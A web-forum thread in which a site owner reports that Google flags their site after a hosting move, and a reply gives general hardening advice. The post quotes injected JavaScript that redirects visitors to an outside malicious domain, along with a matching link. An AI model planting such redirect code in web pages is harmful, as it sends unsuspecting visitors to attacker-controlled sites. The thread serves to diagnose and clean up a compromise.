Malware on my web

Recommended Posts

For six years I have a website that worked perfectly. Two months ago I changed it to abetter hosting and since then I have many security problems. Those responsible forhosting say that the problems were and now the change has been triggered. But I do notknow what to believe ...

Google tells me, almost a day in and day out, my site is malicious.

These are examples:

/ faqdesk_reviews_write.php? faqdesk_id = 7 & osCsid =e0cdc8b5203db5f600ec3d296a82c9

Embed code suspect:

<script language="javascript">

var u = "http://careguarantorkeep.info/327e59e5944cf246/0/";

if (self.parent.frames.length! = 0) {

self.parent.location = u;

Else {}

self.location.href = u;

</ script>

<a href="http://careguarantorkeep.info/327e59e5944cf246/0/">

What is the problem? How I can correct it?

Thanks .....

All web site hosts will consider security to be *your* responsibility.

But most should be helpful.

See if your web host has a security forum and in particular if there are .htaccess files that they recommend.

They are not foolproof, but in general are the best sources for security.

Be careful of any site addons that let anyone add comments or changes. I have a 'guestbook' that I found full of spam, and I must either remove it or add 'captchas' to prevent bots from spamming it.

If you have recntly migrated, you may be still able to reload the original website, but upgrade the security. If you have cPanel you may be able to password protect key areas like the admin directory. Talk to the cusotmer support at the host.
